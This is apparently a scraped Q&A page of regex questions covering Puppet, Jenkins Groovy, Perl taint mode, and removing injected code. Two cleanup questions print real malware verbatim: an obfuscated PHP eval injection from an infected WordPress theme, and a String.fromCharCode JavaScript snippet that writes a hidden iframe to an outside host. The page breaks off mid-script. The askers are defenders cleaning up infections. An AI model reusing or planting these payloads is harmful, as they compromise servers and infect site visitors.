how to test with parameterized regex (e.g. /${user}/) on puppet? - regex

I need to get a user's home directory. I decided to get it with parsing a ::getent_passwd string (which is a custom fact build as
concatenation of the contents of the /etc/passwd)
and extract the relevant information with the help of the regex.
When I test the ::getent with fixed string ("adam"), extraction works:
if "$::getent_passwd" =~ /\|adam:x:[^:]+:[^:]+:[^:]*:([^:]*):/ {
$user_home = $1
notify{"This works":}
}
But when I build a regex with the $user variable, nothing gets matched:
if "$::getent_passwd" =~ /\|${user}:x:[^:]+:[^:]+:[^:]*:([^:]*):/ {
$user_home = $1
} else {
fail{"this fails":}
}
Client and server use Puppet 3.7.3 on Ubuntu 14.04 64bit. Puppetserver uses puppetdb.

It seems, using normal variables in puppet regex is not possible:
https://docs.puppetlabs.com/puppet/latest/reference/lang_datatypes.html#regular-expressions
https://projects.puppetlabs.com/issues/4155
There is workaround proposed in the link above :
regex.erb:
<% if /(^|\s+)#{string2}(\s+|$)/.match(string1) then %>yes<% else %>no<% end %>
manifest:
$testre = template('regex.erb')
if $testre == "yes\n" { notify{"success!": } }

An answer five years later, but now there's an easy way.
For others landing here... Try the regexp constructor to build a regexp from a string :
if("abcd" =~ Regexp("${myvar}") { (...) }

Related

jenkins workflow regex

I'm making my first steps in the Jenkins workflow (Jenkins ver 1.609.1)
I need to read a file, line by line, and then run regex on each line.
I'm interested in the regex "grouping" type, however "project" and "status" variables (the code below) get null value in Jenkins . Any suggestions what is wrong and how to fix it ?
def line = readFile (file)
def resultList = line.tokenize()
for(item in resultList ){
(item =~ /(\w+)=(\w+)$/).each { whole, project, status ->
println (whole)
println (project)
println (status)
}
}
each with a closure will not work: JENKINS-26481
If something using advanced language features works in standalone Groovy but not in Workflow, try just encapsulating it in a method marked #NonCPS. This will effectively run it as a “native” method. Only do this for code you are sure will run quickly and not block on I/O, since it will not be able to survive a Jenkins restart.
Well,
After checking out some other regex options I came around with the following solution that seems working :
def matcher = item =~ /(?<proj>\w+)=(?<status>\w+)/
if( matcher.matches() ) { etc...}

Sublime Text regex to remove wordpress themes files infection

I have a client who had his Wordpress website infected by the famous newsletter plugin/SEO worm.
So I started from a fresh Wordpress install, but his custom theme is only available in the infected version and he has no backup (made by a freelancer unreachable) ...
The infection is just on the first line (I'm sure don't worry :p ) .
It looks like this
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yaagutonoj = 'Qtpz)#]341]88M4P8]37]278]225]241]334]3672%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) 25)utjm!|!*5!%x5c%x7827!hmg%y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]27]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%xc^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c7,18R#>q%x5c%x7825V<*#fop60gvodujpo)##-!#~<#%x5c%x782f%x5c%xx782fh%x5c%x7825)n%x5c%x7825-#+I#)0~:<h%x5c%x7825_t%x5c%x7825:osvufs:~5c%x7825%x5c%x7878:-6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x782place("%x2f%50%x2e%52%x29%57%x65",x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)su6%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78}X%x5c%x7824<!%x5c%x7825tzw>!#]y7)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7825>5)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%xx5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#c%x787fw6*CW&)7gj6<*K)ftpmdX^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x78287f_*#ujojRk3%x5c%x7860{6667824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5cqp%x5c%x7825!|Z~!<##!>!2p%%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]x5c%x7825)3of)fepdof%x5c%x7"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x function fjfgg($n){returnx78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%xl}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)!%x5c%x7825t::!>!%x5c%x7824Ypp5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyidubn%x5c%x7860hfsq)!sp!*5c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x7#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%_*#fmjgk4%x5c%x7860{6~6<tfs%x%x7825s:N}#-%x5c%x7825o:W%x5c%x782x787f;!osvufs}w;*%x5c%x787f!>>%x5%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7827824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%86057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%xR25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%5-#jt0}Z;0]=]0#)2q%x5c%x782524-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf4-%x5c%x7824b!>!%x5c%mpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg825h00#*<%x5c%x7825nfd)##x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878p5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x782!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y8j%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5cc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x7%x5c%x7822)!gj}1~!<2p%x5c)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3x7825yy)#}#-#%x5c%x7824-%x5c%x785h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f61]y33]68]y34]68]y33]65]y31]53]y6d]2ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x78x5c%x7825eN+#Qi%x5c%x78x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%248]y83]256]y81]265]y72]254]y76]7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5cc%x5c%x7825}&;ftmbg}%x5c%61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)5dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x8257%x5c%x782f7###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%**f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827x5c%x7825)ppde>u%x5c%x7825V<#65,47]78]K5]53]Kc#<%x5c%x7825tpz!>!#]Dc%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbtcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bu27-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR323zbe!-#jt0*?]+^?]_%x5c%x785c6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]5)ufttj%x5c%x7822)gj6<^#Y#78256<pd%x5c%x7825w6Z6<.3%x5c*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj1]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rhW~%x5c%x7825fdy)##-!#~<%x5c%x7;!>!}%x5c%x7827;!>>>!}_;gve%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%%x7824*<!%x5c%x7824-%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]s%x5c%x78256~6<%x5c%x787fw6<*K){hnpd19275fubmgoj{h1:|:%x7825bss-%x5c%x7825r%x5c%x7878B)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x78x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x78|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c5c:>1<%x5c%x7825b:>1<!gpsy7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825%x7878:<##:>:h%x5c%x7825:<#x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x782525}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#765ww2)%x5c%x7825w%x5c%x78}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%xy39]271]y83]256]y78]#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7R6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*17824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjuc%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782fq%x5c%x7825:>:r%x5c%x7825:)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x786Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%42]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss134%x78%62%x35%165%x3a%146%x21%75]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]2ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]48]32M3]317]445]212]445]43]321]464]284]364]6]234]3y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<>!#]y84]275]y83]248]y83]256]judovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}3381]y43]78]y33]65]y31]55]y85]82]y76]62x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&if((function_exists("%x6f%142%x5f%163%x74%141%x860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7877825%x5c%x785cSFWSFT%x5c%x7860%x5c%x87fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.5Ld]55#*<%x5c%x7825bG9}:c%x7822!pd%x5c%x7825)!gj}%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7f%x5c%x7860439275ttfsqnpdov{h19275jx782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5cx5c%x7827jsv%x5c%x78]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", N58]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x78248]322]3]364]6]283]427]36]373P6]36]73]864y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%xx7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782407825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!5c%x7860LDPT7-UFOJ%x5c%x7860GB)99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%ftpmdXA6|7**197-2qj%x5c%:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67yek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo##00;quui#>.%x5c%x7825!<*4l}%x5c%x7827;%x5c%x782h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%#00#W~!%x5c%x7825t2w)##Qtjw)2]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:op%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x6]277]y72]265]y39]274]y85]273]y6g]273]y76]271]<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ULL); }+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f chr(ord($n)-1);} #error_reporting(0); preg_reoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7{ $GLOBALS["%x61%156%x75%156%x61"]=1;epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmd275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]yx7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x782567825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x7855c%x7825)fnbozcYufhA%x587fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x7-#w#)ldbqov>*ofmy%x5c%x783]238M7]381]211M5]67]452]88]5]52]y85]256]y6g]257]y86]267]y74f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x7%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825wx5c%x78786<C%x5c%x7827&6<*rfs%x5c3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5cbE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x725)}.;%x5c%x7860UQPMSVD!-id%x5c%24-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%xfubfsdXA%x5c%x7827K6<%x5c%x787fw6*3q4}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2x7822l:!}V;3q%x5c%x78985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x2f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%xfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rf5!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%xA6~6<u%x5c%x78257>%x5c%%x7825z>2<!%x5c%x782%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.x67%42%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x22%f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M/(.*)/epreg_replacetgodenjrri'; $savthdkijb = explode(chr((172-128)),'6639,47,39,57,8359,37,1364,26,8276,46,633,34,1297,67,3647,46,9998,54,6236,32,730,67,4866,53,8595,47,8086,50,4270,29,8931,45,6153,35,6589,50,3518,55,978,28,9858,23,3432,54,8976,33,4745,64,9640,65,5067,31,7543,24,1390,61,7444,31,9313,36,2878,67,883,38,8703,23,3000,48,3792,59,7023,20,5407,67,4245,25,6872,55,6686,46,8891,40,6768,55,3282,53,1911,29,8491,64,5819,62,4117,63,8762,44,1054,27,1817,52,8726,36,5683,49,8136,42,3371,38,9221,32,7281,51,4840,26,3622,25,1974,33,6847,25,5967,37,3731,61,4535,40,3242,40,7778,52,1518,62,7378,66,4299,68,452,47,8806,25,96,28,667,63,4052,65,9179,42,2420,57,3048,25,7970,70,499,68,1869,42,921,57,8234,42,7686,24,3851,65,830,53,7733,45,1143,26,2551,42,2351,69,8185,49,1741,25,9588,52,2593,52,7475,68,2502,49,3983,69,7637,49,4367,52,1451,67,1270,27,2113,60,6732,36,9060,56,3693,38,7710,23,9705,59,1680,61,6927,35,5098,23,2945,55,2645,62,9116,63,4575,60,5931,36,4477,58,3916,34,2173,59,3109,45,261,25,8322,37,4919,54,9396,21,5546,67,567,66,2232,28,1580,70,4180,30,797,33,8040,46,5351,56,6464,28,124,45,6268,48,8861,30,7332,46,355,36,7567,70,7830,42,321,34,6074,26,5264,62,5474,27,7191,53,5613,46,7900,70,6492,60,9349,47,7084,69,169,53,5881,50,1006,48,2330,21,3154,32,2260,70,5153,66,9253,60,1081,62,4973,26,2067,46,5219,45,286,35,4999,68,6408,56,1650,30,9009,51,3409,23,1766,51,9764,41,5501,45,8396,35,6100,53,4635,58,6004,70,7872,28,4693,52,5121,32,9901,68,9969,29,9417,68,9534,54,3950,33,411,41,10052,54,1234,36,8555,40,4210,35,6823,24,2707,50,3186,56,4809,31,2477,25,0,39,7153,38,8831,30,6358,50,6188,48,2007,60,3573,49,1940,34,5326,25,3073,36,1169,65,7244,37,9805,53,8642,61,222,39,8431,60,6962,61,9881,20,5659,24,9485,49,391,20,2757,67,5752,67,2824,54,4419,58,6316,42,5732,20,3486,32,3335,36,6552,37,7043,41,8178,7'); $nibnkcwalu=substr($yaagutonoj,(49971-39865),(41-34)); if (!function_exists('twwdyxiyuj')) { function twwdyxiyuj($gfkbogqkzl, $xpwveotxbw) { $bepljhengq = NULL; for($oznuhtwycd=0;$oznuhtwycd<(sizeof($gfkbogqkzl)/2);$oznuhtwycd++) { $bepljhengq .= substr($xpwveotxbw, $gfkbogqkzl[($oznuhtwycd*2)],$gfkbogqkzl[($oznuhtwycd*2)+1]); } return $bepljhengq; };} $azydrlsozu="\x20\57\x2a\40\x73\152\x76\152\x63\167\x61\147\x65\160\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x35\71\x36\55\x35\60\x34\51\x29\54\x20\164\x77\167\x64\171\x78\151\x79\165\x6a\50\x24\163\x61\166\x74\150\x64\153\x69\152\x62\54\x24\171\x61\141\x67\165\x74\157\x6e\157\x6a\51\x29\51\x3b\40\x2f\52\x20\145\x63\141\x6f\156\x74\151\x6a\146\x6c\40\x2a\57\x20"; $xpkuyrwixg=substr($yaagutonoj,(30604-20491),(47-35)); $xpkuyrwixg($nibnkcwalu, $azydrlsozu, NULL); $xpkuyrwixg=$azydrlsozu; $xpkuyrwixg=(455-334); $yaagutonoj=$xpkuyrwixg-1; ?>
It always start with <?php if(!isset($GLOBALS[ and ends with -1; ?>.
I tried to mess around with sed and regexes, but i can't get it working, i'm very bad with regular expressions ...
So I thought it would be easier to use the Search and replace function from Sublim Text, but I need help to make a regex that matches this pattern:
Something starting with <?php if(!isset($GLOBALS[ and ending with -1; ?>.
<\?php if\(!isset\(\$GLOBALS\[.*-1; \?>
should be enough for you.

Perl taint mode with domain name input for CGI resulting in “Insecure dependency in eval”

Given the following in a CGI script with Perl and taint mode I have not been able to get past the following.
tail /etc/httpd/logs/error_log
/usr/local/share/perl5/Net/DNS/Dig.pm line 906 (#1)
(F) You tried to do something that the tainting mechanism didn't like.
The tainting mechanism is turned on when you're running setuid or
setgid, or when you specify -T to turn it on explicitly. The
tainting mechanism labels all data that's derived directly or indirectly
from the user, who is considered to be unworthy of your trust. If any
such data is used in a "dangerous" operation, you get this error. See
perlsec for more information.
[Mon Jan 6 16:24:21 2014] dig.cgi: Insecure dependency in eval while running with -T switch at /usr/local/share/perl5/Net/DNS/Dig.pm line 906.
Code:
#!/usr/bin/perl -wT
use warnings;
use strict;
use IO::Socket::INET;
use Net::DNS::Dig;
use CGI;
$ENV{"PATH"} = ""; # Latest attempted fix
my $q = CGI->new;
my $domain = $q->param('domain');
if ( $domain =~ /(^\w+)\.(\w+\.?\w+\.?\w+)$/ ) {
$domain = "$1\.$2";
}
else {
warn("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $domain: $!");
$domain = ""; # successful match did not occur
}
my $dig = new Net::DNS::Dig(
Timeout => 15, # default
Class => 'IN', # default
PeerAddr => $domain,
PeerPort => 53, # default
Proto => 'UDP', # default
Recursion => 1, # default
);
my #result = $dig->for( $domain, 'NS' )->to_text->rdata();
#result = sort #result;
print #result;
I normally use Data::Validate::Domain to do checking for a “valid” domain name, but could not deploy it in a way in which the tainted variable error would not occur.
I read that in order to untaint a variable you have to pass it through a regex with capture groups and then join the capture groups to sanitize it. So I deployed $domain =~ /(^\w+)\.(\w+\.?\w+\.?\w+)$/. As shown here it is not the best regex for the purpose of untainting a domain name and covering all possible domains but it meets my needs. Unfortunately my script is still producing tainted failures and I can not figure out how.
Regexp-Common does not provide a domain regex and modules don’t seem to work with untainting variable so I am at a loss now.
How to get this thing to pass taint checking?
$domain is not tainted
I verified that your $domain is not tainted. This is the only variable you use that could be tainted, in my opinion.
perl -T <(cat <<'EOF'
use Scalar::Util qw(tainted);
sub p_t($) {
if (tainted $_[0]) {
print "Tainted\n";
} else {
print "Not tainted\n";
}
}
my $domain = shift;
p_t($domain);
if ($domain =~ /(^\w+)\.(\w+\.?\w+\.?\w+)$/) {
$domain = "$1\.$2";
} else {
warn("$domain\n");
$domain = "";
}
p_t($domain);
EOF
) abc.def
It prints
Tainted
Not tainted
What Net::DNS::Dig does
See Net::DNS::Dig line 906. It is the beginning of to_text method.
sub to_text {
my $self = shift;
my $d = Data::Dumper->new([$self],['tobj']);
$d->Purity(1)->Deepcopy(1)->Indent(1);
my $tobj;
eval $d->Dump; # line 906
…
From new definition I know that $self is just hashref containing values from new parameters and several other filled in the constructor. The evaled code produced by $d->Dump is setting $tobj to a deep copy of $self (Deepcopy(1)), with correctly set self-references (Purity(1)) and basic pretty-printing (Indent(1)).
Where is the problem, how to debug
From what I found out about &Net::DNS::Dig::to_text, it is clear that the problem is at least one tainted item inside $self. So you have a straightforward way to debug your problem further: after constructing the $dig object in your script, check which of its items is tainted. You can dump the whole structure to stdout using print Data::Dumper::Dump($dig);, which is roughly the same as the evaled code, and check suspicious items using &Scalar::Util::tainted.
I have no idea how far this is from making Net::DNS::Dig work in taint mode. I do not use it, I was just curious and wanted to find out, where the problem is. As you managed to solve your problem otherwise, I leave it at this stage, allowing others to continue debugging the issue.
As resolution to this question if anyone comes across it in the future it was indeed the module I was using which caused the taint checks to fail. Teaching me an important lesson on trusting modules in a CGI environment. I switched to Net::DNS as I figured it would not encounter this issue and sure enough it does not. My code is provided below for reference in case anyone wants to accomplish the same thing I set out to do which is: locate the nameservers defined for a domain within its own zone file.
#!/usr/bin/perl -wT
use warnings;
use strict;
use IO::Socket::INET;
use Net::DNS;
use CGI;
$ENV{"PATH"} = ""; // Latest attempted fix
my $q = CGI->new;
my $domain = $q->param('domain');
my #result;
if ( $domain =~ /(^\w+)\.(\w+\.?\w+\.?\w+)$/ ) {
$domain = "$1\.$2";
}
else {
warn("TAINTED DATA SENT BY $ENV{'REMOTE_ADDR'}: $domain: $!");
$domain = ""; # successful match did not occur
}
my $ip = inet_ntoa(inet_aton($domain));
my $res = Net::DNS::Resolver->new(
nameservers => [($ip)],
);
my $query = $res->query($domain, "NS");
if ($query) {
foreach my $rr (grep { $_->type eq 'NS' } $query->answer) {
push(#result, $rr->nsdname);
}
}
else {
warn "query failed: ", $res->errorstring, "\n";
}
#result = sort #result;
print #result;
Thanks for the comments assisting me in this matter, and SO for teaching more then any other resource I have come across.

sed multiline replace HTML with javascript malicious code

I've a apache server that has been infected with pieces of malicious javascript code to infect the computers that visit the web page.
What i'm trying to do is remove these pieces of malicious code using find and sed commands in a Linux server.
I have created a regular expression for sed that match almost everything but the "" end tag. It is in a new line and I can't find the way to match it as well.
The malicious code is:
<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+S